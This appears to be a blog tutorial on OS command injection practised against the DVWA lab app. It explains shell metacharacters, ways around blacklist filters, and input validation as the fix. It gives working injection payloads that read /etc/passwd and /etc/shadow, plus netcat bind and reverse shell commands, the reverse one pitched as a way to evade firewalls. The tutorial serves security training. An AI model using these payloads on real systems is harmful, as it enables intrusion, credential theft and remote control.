Command Injection
Command injection also is known as OS Command injection, is an attack technique used to execute commands on a host operating system via a vulnerable web application. Command Injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, and so on) to a system shell. These commands are executed with the privileges of the vulnerable application. These attacks are due to the web application not having sufficient input validation on the command being run.
To test for command Injection you use Metacharacters to string commands together just like you can from the terminal or command prompt
for example, type this into a Linux terminal:
ping -c 4 127.0.0.1 && ls
Adding && between these commands runs the ls command if the preceding ping command is successful.
There are a whole bunch of other Metacharacters you can use, some of the more common ones I have listed below.
MetaCharacters
- ; The semicolon is the most common metacharacter used to test an injection flaw. The shell will run all the commands in sequence separated by the semicolon.
- & Separate multiple commands on one command line. It runs the first command then the second command.
- && Runs the command following && only if the preceding command is successful.
- | The Pipe, pipes the output of the first command into the second command.
- || Redirects the standard outputs of the first command to standard input of the second command.
- ‘ The quote is used to force the shell to interpret and run commands between backticks. Following is an example of this command: Variable=”OS version ‘uname -a'” && echo $variable.
- () The brackets are used to nest commands.
- # The Hash is used as a command line comment.
Command injection With DVWA
DVWA stands for Damn Vulnerable Web Application and if you don’t already have DVWA installed and not checked out my tutorial on setting up a vulnerable Web Server check that out here.
login into DVWA and start off by putting the DVWA Security down to low and click submit.
Now select the Command Injection button and you should be presented with a page that says ‘ping a device’ and gives you a box to enter an IP address. enter any IP address and it will ping that address.
If we take a look at the source by clicking the view source button in the bottom right-hand corner of DVWA, we can see what the Application is doing in the background.
Once you have clicked the view source you will be presented with a new window displaying the PHP code above, which the DVWA team have really nicely commented for us.
Basically, the program takes our input in the form of an IP address then determines what the backend Operating system is (windows or Linux) then runs the appropriate ping command, It then echoes back the output of the command into the web application
As the web application interacts with the backend Operating system and is not sanitizing our input, we can introduce MetaCharactors to string extra commands, allowing us to break out of its intended ping command and run our own commands directly on the backend operating system.
Add the Metacharacter && after your IP address, this allows you to string the second command onto the first and will run as long as the first command is successful, as I know the backend operating system (in this case) is Linux, I
try ls -la to list all the directories the web application is running in.
After running the command you can see the ping command run and then the ls command listing all the directories where the web application is running.
Security Level Medium
Switch the Security level up to medium and try the command again from security level Low.
127.0.0.1&&ls -la
notice the command runs fine with just the IP address but as soon as you add the metacharacter ( && ) and your injected command it does not output anything and reloads the page.
If you take a look at the source you can see the programmer has modified his code from security level low adding a blacklist blocking two metacharacters being added to the input && and ;.
Lucky for us there are plenty of other metacharacters to try.
Changing the metacharacter to a single & or any other that is not on the blacklist, still allows us to inject our command.
Security Level High
Now Increase the security level of DVWA to High, then notice using the same command from Security level medium above now no longer works.
Now let’s open up the source code and take a look at what changes have been made.
It looks like the programmer has extended the metacharacters which are blacklisted in the web application.
But all is not lost, notice the highlighted area in the blacklist above, there is an error in the syntax, the programmer has added an extra space after the | (pipe) Metacharacter and the backtick. This means we should still be able to use command injection as long as we don’t put any spaces in our command and use the pipe like this.
This shows that even though the programmer has made a thorough blacklist one little extra space still lets us inject our commands into the web application.
Security Level Impossible
On Security level Impossible this is how it should be done. If we first take a look at the source we can see what changes have been made to the program.
As you can see from the commented Code above the programmer has got rid of the Blacklist altogether and is now instead validating the user’s input, anything other then an IP address gives the error message “You have entered an invalid IP”.
Things to Try yourself
If you have also installed Mutillidea and bWAPP from my setting up a vulnerable LAMP Server tutorial, Have a go at the command injection section of these.
Remember any command you can run in the terminal you can run after a command injection, you don’t have to just use ls as I have in my examples, try some of these.
127.0.0.1|whoami shows you the user the web application is currently running as.
127.0.0.1|uname -a shows the Operating System version the web server is running.
127.0.0.1&&ifconfig shows you all the network configuration information.
127.0.0.1&&php -v Gives you PHP version running on web applications server.
127.0.0.1&&cat /etc/passwd displays all the users on the backend Linux Server
127.0.0.1&&/etc/shadow displays all hashed passwords but only if you are running with root privileges.
NetCat Remote Shell
If NetCat (nc) is installed on your vulnerable web server and it has the -e option, you should be able to create a remote shell like so.
127.0.0.1&&nc -lp 31337 -e /bin/bash
Then from your pc connect to this listener by typing using the webservers IP address.
nc 192.168.10.5 31337
Reverse NetCat Remote Shell
This is basically the same as the above command except you are getting the web server to connect to your listening port open with NetCat. This is a good way to evade firewalls as inbound traffic is usually blocked but outgoing traffic is not.
On your PC setup NetCat to listen on port 31337
listening nc -lvnp 31337
Then in your command injection get NetCat to send the shell to your IP address.
127.0.0.1&&nc -e /bin/bash 192.168.10.100 31337
===Note===
If you have followed my tutorial on setting up a Vulnerable LAMP Server, you will notice that the version of mint does not have an -e option in NetCat.You need to uninstall the installed version of netcat-openbsd and install the netcat-traditional package.
sudo apt remove netcat-openbsd sudo apt install netcat-traditional
If you are in a situation where you cant just reinstall the version of NetCat, don’t worry take a look at this tutorial from SANS NetCat without an -e? No Problem!
That’s pretty much the basics of command injection but not the end of the Command injection story, we still have blind command injection which I will be writing a tutorial for in the future but only if this one is popular. So check back soon and if you have any critiques or questions please leave a comment below.
;ls
nice try, no command injection in my comments box
lol